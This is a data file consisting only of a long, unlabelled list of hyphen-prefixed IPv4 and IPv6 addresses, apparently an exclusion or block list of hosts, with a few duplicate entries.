-118.193.137.245 -58.63.245.233 -79.134.208.154 -195.201.5.78 -103.234.99.165 -117.55.247.82 -145.239.122.55 -89.33.247.13 -64.78.163.229 -104.165.42.34 -139.224.32.125 -192.157.80.16 -23.88.82.49 -89.108.107.219 -103.74.117.204 -111.65.231.63 -89.169.3.41 -173.236.115.240 -42.96.170.162 -72.52.69.151 -45.114.94.108 -23.88.82.46 -101.226.241.230 -2001:470:1f14:9f0::2 -223.86.27.114 -77.246.159.36 -192.169.224.93 -182.150.24.56 -177.52.170.141 -87.76.31.162 -142.4.107.201 -150.129.216.170 -182.254.215.94 -180.153.90.214 -23.248.229.147 -43.226.39.119 -123.150.244.81 -220.247.240.13 -60.31.254.11 -52.196.86.117 -82.135.148.246 -140.143.96.165 -188.132.147.36 -23.244.190.250 -23.244.241.69 -178.18.141.218 -54.218.91.0 -193.106.4.9 -37.56.86.58 -116.62.28.47 -47.100.116.50 -120.25.161.251 -119.23.68.159 -103.232.30.64 -120.26.69.148 -122.214.243.55 -112.66.75.144 -109.99.89.174 -118.89.217.156 -164.132.134.0 -103.230.100.41 -120.31.136.65 -114.215.173.157 -121.17.160.60 -101.201.208.65 -89.106.23.229 -211.151.248.28 -148.223.146.19 -192.80.147.237 -145.239.122.14 -173.249.10.179 -47.52.167.102 -23.225.239.63 -23.244.241.44 -81.169.232.220 -149.56.101.88 -45.61.115.36 -200.74.240.42 -213.181.107.226 -203.195.171.42 -54.36.183.157 -96.44.178.67 -120.25.220.26 -199.102.44.79 -91.134.247.16 -107.155.74.97 -142.4.107.107 -51.254.64.98 -45.77.40.202 -103.58.160.67 -146.255.35.10 -119.147.137.95 -184.173.102.62 -23.225.239.13 -143.202.217.245 -149.202.184.44 -108.62.5.168 -23.229.227.160 -107.180.79.242 -208.73.20.10 -114.80.100.84 -95.54.194.99 -106.240.253.230 -193.33.111.137 -23.245.142.228 -192.190.225.140 -78.111.82.101 -62.138.137.100 -192.126.112.35 -76.74.170.161 -116.62.65.127 -114.113.126.142 -23.225.113.40 -201.195.254.66 -190.85.34.90 -23.229.227.163 -202.47.95.218 -172.246.101.99 -23.239.20.62 -166.63.21.18 -45.32.187.156 -78.11.107.88 -45.32.178.208 -88.201.19.162 -54.166.140.128 -199.46.107.243 -51.254.218.55 -23.248.229.145 -216.172.188.28 -23.225.95.241 -23.224.115.58 -120.24.246.147 -212.60.66.2 -123.56.30.204 -120.27.29.68 -120.25.222.245 -173.209.43.90 -222.76.210.168 -173.193.8.190 -94.97.253.229 -185.52.3.104 -47.94.215.65 -142.4.216.73 -94.23.44.11 -112.82.241.246 -108.161.134.194 -157.7.131.105 -47.104.168.122 -23.244.190.149 -109.73.168.220 -202.74.238.122 -101.229.24.209 -177.93.110.16 -62.75.218.189 -149.56.64.83 -51.255.113.174 -121.43.115.17 -142.91.95.126 -108.61.168.143 -65.60.5.109 -112.74.107.20 -72.2.118.165 -168.144.159.150 -185.49.165.2 -52.80.154.17 -23.225.113.51 -113.108.232.11 -172.246.101.224 -192.80.147.193 -23.225.89.158 -23.88.82.219 -198.1.94.208 -216.131.90.235 -45.61.113.3 -82.98.68.130 -23.225.89.234 -82.135.148.232 -80.82.71.27 -185.151.96.202 -121.43.158.220 -154.57.7.73 -119.28.47.166 -153.231.209.0 -120.25.86.237 -211.155.229.88 -142.91.95.45 -104.203.82.183 -112.74.48.148 -120.27.6.99 -116.231.1.208 -198.74.59.72 -116.228.114.139 -86.110.225.23 -5.160.247.226 -23.104.135.208 -103.240.181.103 -59.37.40.227 -222.186.39.45 -120.27.151.86 -217.106.238.58 -124.226.64.180 -198.50.176.79 -69.118.234.234 -95.59.26.26 -120.27.246.193 -112.124.116.238 -104.224.198.174 -104.224.198.174 -221.12.118.171 -103.56.158.111 -94.23.25.26 -200.7.243.158 -158.69.142.147 -62.109.14.167 -123.56.45.57 -145.239.90.149 -150.95.109.74 -121.40.26.124 -47.100.50.139 -115.159.5.150 -142.91.95.219 -1.62.108.51 -89.163.218.185 -176.31.64.84 -184.169.136.7 -147.135.138.110 -52.67.66.253 -114.6.195.162 -151.80.235.122 -112.124.1.136 -195.20.15.169 -162.247.232.90 -69.72.0.52 -188.132.147.5 -198.251.67.130 -142.91.95.190 -188.120.233.48 -45.61.115.53 -45.32.100.245 -139.224.15.79 -64.120.123.207 -52.196.168.163 -173.214.188.35 -123.185.161.238 -23.244.190.56 -69.39.232.81 -37.44.45.44 -118.190.69.191 -192.80.147.208 -221.13.201.66 -72.167.184.192 -173.249.159.54 -138.201.142.161 -59.175.142.80 -177.39.16.171 -155.94.144.8 -211.23.117.231 -104.224.198.170 -104.156.238.85 -119.29.247.30 -23.89.139.3 -121.42.155.9 -91.191.172.111 -164.132.91.186 -70.38.56.37 -23.225.239.47 -39.106.200.187 -175.160.159.124 -14.102.151.143 -82.146.46.137 -172.246.101.184 -47.90.75.24 -218.16.123.27 -138.201.250.164 -45.252.248.239 -210.51.190.198 -23.244.241.45 -218.244.142.19 -119.29.204.213 -139.162.243.239 -190.27.225.28 -49.212.170.207 -119.29.67.86 -155.94.205.251 -54.226.255.152 -222.186.31.24 -114.80.156.5 -104.203.82.86 -115.146.123.94 -212.68.50.249 -5.39.85.84 -108.179.251.50 -59.173.7.235 -182.92.105.211 -142.91.95.22 -103.249.104.103 -103.195.240.20 -23.225.239.8 -13.125.126.200 -46.166.130.193 -23.224.115.121 -124.133.51.87 -23.88.82.158 -180.76.237.149 -177.52.160.172 -118.212.132.237 -120.26.138.63 -121.41.5.13 -39.108.53.154 -212.84.163.174 -118.194.132.96 -220.248.226.83 -146.88.70.242 -188.225.16.45 -184.171.249.51 -216.218.193.150 -51.254.5.195 -46.166.167.253 -182.161.77.213 -64.118.92.56 -59.111.93.190 -23.225.89.144 -192.80.147.117 -220.197.198.155 -77.241.17.2 -157.7.243.194 -45.61.114.14 -94.23.171.156 -211.23.34.32 -49.212.202.37 -120.76.159.153 -139.224.12.95 -23.244.241.93 -210.5.46.135 -23.88.82.223 -188.165.210.46 -50.115.116.236 -123.56.20.206 -121.42.26.13 -112.74.44.66 -79.143.187.94 -185.85.239.215 -120.27.44.174 -125.212.220.221 -85.204.127.130 -162.247.235.71 -199.195.117.191 -80.93.190.115 -115.28.240.167 -94.23.67.104 -52.77.239.44 -145.239.29.0 -121.199.37.84 -39.104.80.254 -150.129.216.12 -45.61.112.37 -123.56.70.226 -177.54.142.93 -151.80.42.210 -86.104.177.112 -50.56.185.186 -178.211.32.99 -91.237.109.38 -47.89.10.248 -142.4.107.237 -112.80.35.189 -23.225.95.208 -172.246.101.169 -112.91.153.221 -111.120.79.61 -23.224.115.138 -111.160.231.130 -23.225.89.182 -65.49.9.125 -207.244.95.95 -47.90.93.122 -45.114.94.158 -121.42.151.187 -194.153.131.6 -162.247.96.23 -23.244.190.42 -142.4.107.72 -51.255.113.244 -1.119.11.104 -23.104.135.236 -45.114.94.85 -60.12.85.30 -172.246.101.2 -82.102.14.13 -23.88.158.69 -109.74.5.181 -103.224.250.229 -23.248.229.63 -112.74.211.149 -139.196.212.64 -112.217.220.2 -123.57.227.158 -23.244.190.130 -66.228.36.203 -72.1.245.86 -188.93.18.254 -92.43.113.68 -173.193.8.188 -192.200.117.195 -123.56.186.191 -120.55.73.126 -112.124.69.181 -112.124.69.181 -142.4.119.99 -23.227.186.237 -174.37.59.8 -167.114.241.254 -106.39.122.46 -142.91.95.6 -107.191.63.213 -60.205.111.143 -45.61.112.49 -149.56.184.138 -92.222.208.180 -120.78.221.16 -23.248.229.225 -173.214.244.3 -23.229.227.161 -69.42.76.78 -45.77.132.52 -212.68.42.167 -123.30.129.172 -157.7.249.62 -173.236.115.17 -185.174.30.135 -137.74.173.188 -5.254.88.182 -172.247.51.59 -50.116.106.127 -96.44.172.86 -98.126.243.190 -123.207.235.125 -121.40.37.134 -41.222.10.228 -212.129.54.95 -66.220.11.146 -120.55.193.210 -192.155.92.70 -183.182.87.141 -37.157.182.181 -103.224.249.248 -86.104.177.118 -200.98.20.17 -38.126.22.80 -52.23.221.78 -31.28.24.133 -47.104.63.235 -104.203.82.226 -23.104.135.28 -23.248.229.127 -91.222.125.198 -137.175.66.19 -66.154.123.114 -37.59.213.68 -195.110.59.69 -51.255.113.240 -180.166.202.92 -150.129.216.16 -23.225.89.107 -153.125.234.23 -183.56.148.100 -91.201.88.8 -101.64.237.204 -23.224.115.142 -137.74.176.217 -23.224.115.56 -221.12.99.98 -204.44.66.116 -23.229.227.164 -34.230.2.189 -194.242.30.27 -192.80.147.199 -23.248.229.115 -39.106.77.45 -216.22.14.31 -86.104.177.125 -172.104.191.61 -45.114.94.154 -211.101.11.154 -37.61.238.120 -173.230.136.35 -118.184.55.203 -193.70.42.249 -192.151.202.100 -112.29.172.9 -103.224.81.30 -142.4.107.218 -23.224.115.41 -149.210.223.196 -66.70.223.73 -199.102.46.202 -50.97.180.226 -220.158.37.64 -96.44.141.164 -123.57.45.183 -120.76.234.164 -218.19.216.151 -62.112.9.12 -23.244.190.186 -64.64.7.223 -124.202.152.240 -165.225.151.217 -64.62.194.13 -103.49.210.38 -204.11.34.21 -199.204.51.10 -103.45.18.135 -163.44.206.177 -54.223.220.51 -104.200.21.183 -101.201.73.161 -66.254.176.70 -45.61.113.15 -104.207.50.104 -186.42.225.76 -144.76.226.250 -188.132.135.28 -157.7.196.132 -101.201.101.237 -188.214.22.7 -142.91.95.167 -52.221.21.42 -45.76.148.228 -45.61.112.30 -145.239.122.16 -52.207.36.156 -142.4.107.124 -192.80.147.134 -37.59.213.82 -82.135.151.103 -195.154.62.43 -54.88.30.14 -142.91.95.166 -104.130.247.179 -151.236.42.10 -108.179.227.65 -61.158.22.154 -208.167.241.99 -142.4.103.105 -207.148.75.170 -42.62.112.76 -85.214.46.112 -64.120.123.219 -103.31.131.245 -160.16.70.93 -72.1.245.124 -192.187.120.234 -120.27.149.212 -112.74.75.96 -217.76.40.52 -54.64.2.24 -92.222.206.223 -77.68.38.149 -195.85.214.17 -45.32.56.130 -50.115.161.197 -95.158.131.150 -45.61.113.8 -178.33.165.74 -67.222.143.118 -86.104.177.13 -122.114.222.232 -212.68.42.168 -188.93.127.48 -114.55.32.107 -62.149.1.99 -64.15.146.137 -139.199.84.218 -104.207.40.146 -82.135.151.244 -77.81.104.134 -50.234.108.11 -183.6.105.168 -95.183.8.24 -107.190.232.68 -64.120.123.206 -37.59.50.15 -174.143.241.218 -114.143.239.149 -50.16.194.248 -202.166.199.195 -125.118.85.91 -103.51.64.42 -172.247.51.98 -23.224.115.150 -222.73.135.65 -41.59.18.123 -89.33.247.21 -202.155.206.4 -174.142.16.13 -133.203.23.53 -103.16.133.253 -108.61.187.252 -198.46.157.200 -85.234.159.0 -94.52.230.188 -101.227.102.234 -78.61.194.14 -85.214.248.140 -123.207.111.126 -158.69.229.126 -166.63.21.20 -173.239.23.86 -91.237.99.141 -45.114.94.164 -112.90.225.20 -51.255.113.214 -23.224.115.90 -180.131.42.64 -142.4.119.87 -54.202.82.19 -23.104.135.137 -108.168.238.133 -123.206.183.69 -37.114.200.137 -142.91.95.181 -104.207.52.100 -23.245.142.201 -193.70.94.253 -103.197.57.162 -149.202.103.26 -204.11.236.214 -218.17.59.162 -23.224.40.190 -37.187.55.59 -198.44.248.100 -222.162.177.214 -117.122.211.70 -23.80.2.154 -142.91.95.51 -119.29.58.32 -82.202.249.123 -192.162.112.2 -104.207.50.123 -104.155.66.217 -123.57.243.214 -107.148.194.28 -149.210.166.99 -23.246.202.249 -144.76.198.38 -35.202.220.14 -104.207.44.86 -23.224.115.149 -23.225.89.133 -189.36.144.21 -120.26.121.172 -39.108.67.119 -23.224.244.15 -69.30.202.74 -223.167.110.18 -104.37.212.119 -121.199.15.106 -107.155.102.117 -107.180.68.236 -185.164.30.21 -54.169.121.103 -139.199.96.241 -45.76.180.178 -163.172.167.251 -172.110.20.203 -82.135.151.171 -202.4.105.220 -23.225.95.164 -162.247.234.93 -114.215.28.154 -132.148.139.26 -219.233.216.252 -184.107.164.62 -200.111.46.19 -54.161.217.181 -95.173.186.125 -218.244.142.104 -150.129.216.80 -172.247.250.230 -113.196.77.220 -150.95.133.230 -178.87.197.142 -183.57.149.156 -142.44.236.6 -54.172.178.148 -123.57.219.81 -120.27.240.127 -45.32.206.86 -23.225.89.179 -103.20.193.54 -172.247.51.75 -139.196.195.172 -195.242.161.57 -120.76.42.235 -192.80.147.201 -87.226.145.49 -97.74.134.176 -104.207.52.79 -209.222.235.202 -89.219.33.227 -190.116.175.5 -192.157.252.127 -115.236.177.83 -192.163.215.214 -199.167.41.249 -23.88.82.10 -144.168.124.9 -86.104.177.48 -163.172.224.153 -34.252.78.87 -103.16.131.78 -101.200.86.228 -23.244.190.172 -164.132.116.6 -192.80.147.151 -23.249.47.198 -213.207.92.103 -111.171.219.90 -66.83.244.3 -47.92.0.51 -181.174.98.122 -125.212.233.206 -115.88.68.114 -116.255.174.132 -121.100.19.34 -185.17.110.39 -121.40.20.83 -103.18.33.98 -192.80.147.98 -54.80.185.19 -185.55.79.152 -198.98.62.79 -195.206.253.20 -69.13.210.181 -51.254.92.92 -198.50.142.171 -104.203.82.195 -192.80.147.62 -123.31.40.42 -119.23.229.130 -60.205.57.177 -91.121.65.159 -202.70.136.176 -160.19.50.231 -23.225.113.140 -45.252.249.131 -166.63.21.73 -202.153.34.254 -5.39.75.106 -23.244.241.55 -217.23.4.127 -190.202.88.11 -220.181.160.166 -37.59.146.76 -108.179.225.147 -91.236.24.27 -101.200.191.75 -60.191.230.26 -42.112.29.35 -23.104.135.142 -23.224.115.145 -188.93.15.162 -149.56.131.144 -144.168.69.153 -150.107.3.25 -103.246.18.14 -162.212.101.164 -120.24.213.239 -185.12.6.139 -158.39.75.164 -146.148.35.122 -172.247.51.22 -198.200.41.117 -184.154.109.173 -104.165.41.138 -182.16.7.20 -209.236.126.63 -211.167.105.24 -66.212.31.76 -37.195.48.10 -45.61.114.18 -221.214.219.118 -47.92.158.216 -78.155.196.66 -195.2.252.168 -180.76.100.114 -23.225.95.140 -142.91.95.129 -123.31.12.128 -185.8.173.177 -116.62.134.101 -117.139.123.90 -47.91.230.146 -34.192.71.130 -45.122.220.158 -200.72.176.59 -212.147.79.242 -124.192.148.33 -162.253.34.32 -23.224.242.62 -202.29.215.221 -67.231.23.169 -31.192.215.188 -188.213.31.87 -54.88.163.244 -120.25.145.13 -115.28.223.79 -185.182.96.76 -2607:9000:0:35::7346:671d -121.42.188.130 -62.213.67.37 -82.202.237.66 -104.207.40.147 -153.122.116.117 -217.23.11.103 -185.171.24.78 -45.114.94.211 -185.174.30.151 -144.168.73.136 -174.37.242.44 -115.159.207.63 -66.254.177.67 -112.74.39.243 -51.255.91.240 -112.121.100.250 -153.213.251.237 -118.190.200.150 -173.201.177.218 -23.225.113.101 -114.113.232.69 -108.59.11.41 -60.251.83.156 -23.225.113.212 -98.143.158.73 -115.159.181.46 -112.126.65.19 -23.244.190.113 -27.111.45.136 -101.81.74.160 -153.122.20.98 -91.240.84.35 -58.57.46.34 -78.108.88.244 -162.144.127.58 -172.104.233.13 -171.108.231.233 -106.187.93.176 -23.244.190.177 -188.165.30.178 -23.225.95.54 -198.24.128.20 -23.244.190.151 -172.247.51.131 -120.79.157.90 -119.23.63.18 -39.110.142.33 -198.65.151.229 -107.183.17.174 -52.66.66.214 -115.28.145.102 -188.120.246.14 -142.44.226.201 -219.94.249.135 -173.249.27.223 -109.169.86.240 -65.60.43.188 -46.245.167.20 -115.29.184.51 -112.25.69.38 -95.213.253.5 -34.229.101.9 -104.203.82.46 -116.255.211.211 -139.159.215.23 -176.31.16.47 -146.0.232.5 -139.196.226.82 -121.40.39.229 -103.224.248.173 -67.55.83.190 -58.63.245.249 -37.48.64.68 -175.107.15.157 -94.102.68.82 -95.211.91.97 -23.225.89.236 -203.174.58.124 -194.54.83.194 -144.217.14.210 -54.68.222.64 -81.169.229.83 -121.40.115.201 -49.212.202.41 -104.223.117.54 -103.29.190.65 -125.206.126.47 -104.149.201.52 -47.97.91.9 -49.212.190.146 -37.220.20.253 -115.28.45.188 -185.37.228.142 -116.255.249.27 -180.92.229.226 -200.44.167.15 -163.44.206.212 -212.116.121.49 -108.61.205.181 -172.246.101.163 -108.163.140.80 -113.42.230.147 -172.247.51.126 -185.174.29.228 -93.158.203.82 -54.210.138.147 -91.191.174.62 -23.244.190.122 -118.190.66.104 -134.213.31.80 -54.251.63.196 -176.223.197.46 -91.83.238.14 -23.244.241.84 -85.214.133.202 -50.22.82.124 -192.154.231.113 -118.178.235.232 -183.63.52.135 -95.172.154.38 -188.132.147.147 -132.148.83.1 -27.96.16.165 -37.48.122.136 -117.79.81.10 -198.15.127.133 -72.44.88.29 -194.58.121.112 -120.24.93.104 -106.75.62.221 -80.87.198.216 -119.29.133.66 -220.231.191.196 -59.110.162.187 -203.151.157.159 -182.138.102.204 -183.111.138.152 -37.187.196.9 -178.57.218.48 -211.100.52.171 -216.131.67.201 -109.120.171.70 -115.159.48.204 -203.162.166.85 -23.89.79.130 -89.29.203.91 -118.190.18.207 -52.91.14.182 -208.93.93.93 -106.14.195.20 -62.215.137.250 -176.123.220.51 -188.93.18.214 -164.132.81.82 -203.128.246.77 -41.226.162.78 -123.57.84.73 -162.209.126.100 -91.134.160.76 -219.238.207.88 -172.246.101.59 -60.205.176.119 -74.86.236.83 -193.224.130.162 -119.147.168.236 -178.33.167.132 -93.170.129.53 -45.114.94.253 -192.99.78.19 -45.61.115.21 -23.225.89.46 -173.212.192.102 -27.254.48.159 -108.170.39.92 -45.114.94.42 -123.30.157.39 -132.148.25.72 -142.91.95.213 -23.225.95.31 -37.120.174.54 -45.76.176.222 -106.15.89.224 -209.142.66.207 -43.230.203.166 -94.237.35.31 -188.120.237.13 -66.154.119.100 -114.215.68.184 -185.174.30.183 -47.96.151.125 -24.132.64.42 -34.204.77.15 -213.207.92.106 -123.30.110.246 -188.230.120.36 -107.180.68.125 -185.174.28.115 -5.134.109.169 -120.76.120.24 -178.255.100.240 -119.61.66.50 -103.200.118.138 -182.160.99.212 -172.110.20.201 -157.7.248.20 -81.2.209.37 -131.100.24.215 -67.207.144.68 -23.244.190.213 -213.165.189.183 -188.117.45.203 -192.119.13.173 -13.229.196.72 -217.174.252.19 -49.212.187.154 -183.167.230.126 -106.120.127.35 -35.200.181.157 -51.255.51.127 -31.171.244.239 -117.62.173.19 -23.104.135.109 -161.202.191.129 -23.104.135.209 -107.190.143.124 -23.248.229.166 -185.27.134.117 -212.42.119.3 -122.152.216.152 -69.87.198.126 -111.231.0.55 -114.215.103.148 -62.109.22.87 -13.82.230.163 -185.66.142.41 -153.120.58.239 -2405:200:1601:c400:10:130:21:15 -139.129.229.73 -173.214.250.8 -111.35.0.114 -52.68.239.114 -182.163.48.96 -112.78.1.240 -132.148.135.142 -47.88.190.179 -23.104.135.71 -116.236.231.202 -51.255.38.148 -203.78.141.96 -123.207.164.102 -213.138.119.44 -139.199.192.101 -180.175.3.175 -23.104.135.203 -104.238.184.143 -47.104.26.78 -64.118.95.201 -153.120.25.128 -217.20.171.108 -193.218.145.95 -185.174.30.203 -23.104.135.248 -213.189.63.206 -35.194.249.46 -118.190.24.197 -23.248.229.252 -45.61.114.44 -61.67.218.213 -209.160.39.36 -200.75.30.48 -185.174.29.181 -142.4.107.197 -35.154.216.133 -184.172.97.221 -193.189.75.248 -180.178.60.235 -216.131.75.1 -172.246.101.131 -222.128.40.95 -114.55.100.41 -101.201.73.105 -96.44.169.219 -23.225.239.207 -47.104.77.172 -104.250.132.237 -193.228.153.3 -144.168.70.134 -123.207.242.227 -221.133.13.113 -139.159.215.22 -74.208.146.208 -203.148.250.162 -124.240.185.9 -86.104.177.35 -120.78.183.113 -121.40.194.42 -130.185.78.199 -103.72.166.3 -61.220.31.217 -64.140.158.37 -173.212.194.124 -192.80.147.195 -82.135.148.252 -133.242.165.163 -209.142.66.204 -31.220.54.12 -94.23.159.126 -39.71.226.28 -94.126.170.92 -120.77.72.219 -89.108.111.38 -199.16.108.249 -23.244.241.51 -159.93.226.102 -47.52.157.221 -119.29.140.25 -62.109.1.86 -195.161.162.61 -43.240.100.90 -47.92.67.40 -23.111.141.157 -192.225.225.57 -149.202.221.96 -112.126.68.253 -210.79.84.69 -67.225.189.121 -23.104.135.110 -116.255.225.12 -95.211.193.49 -93.174.163.192 -47.97.11.85 -89.163.152.33 -58.68.247.38 -115.236.4.2 -64.118.90.234 -23.244.241.23 -62.149.9.174 -142.91.95.50 -74.205.223.194 -123.57.7.142 -122.13.163.233 -178.238.236.198 -118.193.206.36 -46.4.48.67 -121.75.23.246 -45.33.52.167 -124.81.48.93 -89.33.247.32 -139.129.204.152 -104.203.82.187 -190.221.32.43 -77.75.123.247 -192.254.199.87 -111.38.216.121 -195.82.189.54 -93.187.202.80 -45.32.23.145 -103.74.117.181 -133.242.83.140 -121.41.47.3 -162.250.125.3 -82.135.151.199 -13.228.173.73 -23.88.158.99 -184.154.109.174 -83.233.205.44 -88.99.144.235 -192.237.253.93 -120.78.143.11 -38.88.86.248 -37.120.164.76 -61.152.244.92 -162.216.19.230 -103.45.99.144 -185.174.28.156 -37.128.146.129 -142.4.119.109 -177.91.95.209 -23.88.82.248 -101.201.105.230 -172.247.51.65 -103.254.14.161 -213.207.92.102 -91.121.113.120 -166.63.21.12 -149.56.111.131 -192.80.147.23 -211.152.53.163 -23.244.190.131 -188.165.22.51 -36.79.18.170 -120.25.68.161 -123.57.137.254 -185.85.73.250 -41.141.250.159 -118.123.13.20 -166.62.122.197 -94.102.53.2 -116.255.248.128 -142.91.95.52 -91.239.124.165 -23.225.95.244 -212.47.246.222 -104.238.81.165 -5.135.158.3 -213.136.92.243 -50.116.7.53 -142.4.9.102 -121.41.51.102 -23.225.95.224 -112.74.218.235 -27.120.99.155 -23.23.30.63 -192.99.6.144 -124.124.66.42 -23.239.29.70 -58.87.88.185 -203.195.132.103 -162.247.154.53 -94.127.6.130 -205.209.135.77 -54.36.173.16 -123.207.35.32 -121.199.35.129 -118.193.234.27 -74.207.232.79 -58.83.148.100 -208.43.222.103 -47.90.106.98 -217.16.2.23 -123.56.157.95 -176.31.106.51 -54.255.196.47 -52.196.99.4 -222.173.219.166 -70.38.67.118 -121.42.143.166 -119.2.3.50 -139.129.50.210 -107.190.235.78 -69.39.232.91 -115.28.46.207 -45.76.162.247 -115.159.73.176 -51.254.115.192 -188.120.253.141 -178.33.39.247 -89.250.87.19 -79.172.213.89 -115.236.7.211 -194.146.226.177 -198.11.234.98 -211.152.9.215 -111.205.196.30 -121.201.9.107 -192.99.25.231 -199.193.153.121 -198.61.190.32 -67.222.133.249 -203.146.215.116 -122.152.203.71 -23.248.229.160 -61.28.230.91 -209.59.130.69 -123.126.109.217 -177.101.146.219 -139.162.82.203 -1.119.133.106 -136.243.54.25 -27.254.59.40 -104.200.28.224 -96.126.104.129 -172.247.51.221 -47.89.49.198 -109.73.168.198 -31.131.16.101 -139.162.99.196 -220.76.19.152 -65.60.5.77 -40.125.203.68 -172.246.101.133 -188.120.245.205 -5.196.76.68 -82.135.151.245 -121.41.42.200 -107.190.232.73 -122.114.105.232 -45.252.249.106 -49.50.8.196 -106.186.18.200 -60.251.37.128 -185.174.30.148 -82.146.60.207 -109.73.168.231 -118.190.68.231 -59.42.254.212 -166.62.118.241 -212.158.160.54 -123.57.54.108 -192.155.224.187 -198.61.196.148 -31.17.79.26 -47.91.140.25 -218.76.54.43 -198.100.145.137 -145.239.23.148 -45.6.108.7 -67.225.172.105 -83.167.226.128 -120.77.205.39 -77.92.144.8 -120.92.214.3 -218.65.134.74 -217.174.148.26 -202.60.104.124 -185.66.142.58 -50.97.136.208 -64.120.123.130 -2405:200:1601:c400:10:130:21:19 -177.69.225.151 -103.54.250.243 -203.143.103.38 -39.109.126.34 -23.225.95.81 -179.43.152.43 -45.122.253.243 -216.92.83.229 -218.95.39.80 -54.248.233.245 -166.62.45.119 -193.70.107.45 -37.59.132.227 -58.216.232.126 -94.130.27.110 -188.132.147.150 -120.25.248.248 -123.30.169.4 -66.37.12.85 -104.239.194.74 -122.114.62.158 -85.31.96.9 -223.83.67.7 -192.80.147.50 -118.190.90.57 -103.212.34.150 -93.174.163.198 -216.92.211.244 -46.105.90.134 -66.175.216.110 -123.206.18.161 -194.135.80.98 -208.92.165.4 -47.90.1.115 -192.155.246.146 -178.238.235.210 -185.93.245.38 -54.196.207.131 -61.58.60.240 -114.55.84.60 -23.244.190.25 -86.104.177.20 -202.152.203.87 -208.87.37.240 -49.212.204.170 -123.30.149.83 -118.190.2.75 -211.141.124.52 -79.143.181.207 -142.91.95.5 -91.203.70.134 -185.38.45.107 -198.50.152.20 -103.231.81.202 -203.150.20.39 -51.255.202.29 -119.38.160.27 -45.114.94.75 -188.116.7.23 -169.51.2.152 -104.203.82.97 -180.250.80.88 -149.56.79.210 -23.225.239.241 -88.208.204.117 -136.243.191.137 -111.230.242.57 -108.61.119.172 -52.202.52.171 -51.254.188.187 -139.199.18.51 -120.25.208.28 -222.255.122.168 -185.83.147.153 -183.81.165.151 -92.50.166.77 -75.103.109.192 -216.131.68.113 -23.225.239.113 -216.131.86.194 -101.200.202.224 -120.24.238.241 -115.28.34.71 -192.80.147.128 -217.145.92.13 -160.16.121.192 -213.136.76.101 -157.159.29.22 -67.58.50.75 -103.71.153.204 -190.181.60.21 -123.30.144.43 -121.14.195.136 -106.187.34.122 -120.55.97.49 -85.204.50.39 -5.135.224.52 -37.26.165.133 -23.224.115.88 -69.9.36.181 -112.78.1.67 -202.70.45.71 -66.55.144.203 -82.135.151.113 -183.134.73.213 -61.114.230.122 -94.23.199.180 -119.23.14.26 -23.88.82.84 -61.90.198.151 -162.144.101.184 -109.123.155.96 -23.104.135.77 -172.246.101.146 -130.211.241.97 -202.201.7.104 -128.42.60.131 -181.48.80.213 -103.248.253.90 -173.192.204.12 -70.32.122.27 -209.236.114.128 -150.129.216.105 -104.251.215.15 -70.168.89.134 -125.212.212.6 -216.117.131.15 -121.43.153.250 -222.186.68.80 -92.240.68.120 -46.105.58.104 -185.107.66.24 -119.42.149.188 -45.79.76.19 -72.1.245.73 -23.244.241.183 -120.25.233.157 -93.174.163.196 -67.220.184.100 -117.141.211.5 -37.187.54.12 -185.114.192.38 -115.29.172.92 -37.26.236.12 -120.26.196.2 -185.174.30.179 -103.13.29.99 -66.85.175.14 -188.165.6.207 -222.255.175.36 -81.169.236.232 -46.105.172.243 -216.131.81.122 -107.190.140.44 -34.204.86.59 -220.197.198.166 -114.215.253.201 -82.135.148.49 -115.28.219.22 -59.57.15.140 -123.31.43.241 -125.253.127.253 -149.202.44.25 -23.244.241.48 -123.57.90.144 -216.131.86.195 -23.225.113.197 -23.224.243.25 -192.81.132.162 -220.128.216.42 -216.131.119.105 -146.88.73.6 -61.95.192.218 -216.131.64.170 -172.110.10.97 -173.209.42.105 -103.196.195.244 -123.31.12.120 -23.94.43.11 -23.94.43.11 -203.162.79.171 -123.31.28.223 -45.32.220.83 -216.131.68.118 -216.131.75.10 -112.121.100.225 -103.30.5.24 -23.225.113.189 -87.98.216.86 -192.200.117.198 -116.62.175.106 -223.25.102.140 -37.247.103.190 -34.204.42.96 -95.211.148.166 -182.61.40.118 -115.28.135.7 -109.235.252.151 -123.31.17.46 -69.50.196.79 -118.194.128.49 -145.239.122.62 -115.159.97.28 -167.114.101.77 -107.191.99.160 -60.191.147.50 -185.26.114.111 -23.225.89.44 -180.178.45.214 -193.70.72.220 -54.238.214.225 -133.186.135.73 -119.29.73.82 -210.140.77.46 -222.161.138.57 -64.120.123.203 -23.88.82.137 -149.56.165.170 -173.212.220.96 -23.244.190.169 -192.95.39.153 -34.208.52.149 -123.207.31.43 -172.80.123.76 -77.55.227.75 -54.199.222.231 -133.242.175.89 -115.159.59.54 -23.244.241.182 -132.148.7.153 -178.32.120.68 -58.216.215.19 -144.217.84.33 -86.107.228.134 -218.244.158.160 -139.0.4.139 -216.131.81.124 -188.125.164.19 -121.40.161.128 -5.39.66.115 -184.106.199.17 -5.63.159.34 -216.131.114.190 -85.235.217.101 -192.0.19.76 -54.36.90.8 -118.31.112.77 -82.77.133.60 -82.135.151.243 -23.225.95.209 -89.218.250.66 -90.188.115.125 -185.152.212.135 -216.92.99.141 -69.50.196.169 -114.55.128.42 -198.50.140.176 -180.235.148.57 -199.59.82.214 -216.131.78.205 -185.52.3.142 -80.93.212.146 -176.31.100.136 -198.61.129.233 -104.199.233.110 -203.162.166.9 -162.221.187.2 -195.19.235.41 -194.30.100.154 -60.205.211.44 -208.72.120.102 -138.201.66.78 -145.239.122.63 -172.247.51.227 -208.167.241.105 -37.148.211.6 -45.33.72.221 -94.23.166.152 -188.225.74.240 -213.202.217.2 -38.108.92.57 -104.207.50.124 -198.55.102.17 -123.30.145.254 -123.30.59.47 -65.60.46.154 -103.48.190.72 -123.31.17.52 -125.253.127.3 -31.186.101.122 -123.30.128.171 -103.99.1.241 -166.63.21.41 -77.81.120.248 -5.187.33.164 -52.9.1.47 -34.204.11.174 -52.69.182.96 -109.169.76.48 -23.88.95.133 -52.87.225.225 -50.18.153.130 -94.103.98.34 -104.203.82.208 -89.163.131.131 -172.246.101.150 -103.224.249.212 -150.129.216.225 -112.74.103.144 -112.137.166.155 -115.29.209.174 -52.91.79.110 -119.81.146.235 -61.8.135.156 -74.118.135.11 -190.92.82.10 -217.182.65.119 -122.114.181.179 -198.61.147.95 -210.5.43.215 -223.4.246.239 -145.239.37.185 -104.203.82.7 -37.59.213.74 -172.104.152.44 -116.62.187.89 -164.160.33.241 -50.23.78.148 -153.126.164.33 -23.225.95.44 -150.129.216.169 -198.200.41.89 -213.136.86.40 -35.195.120.190 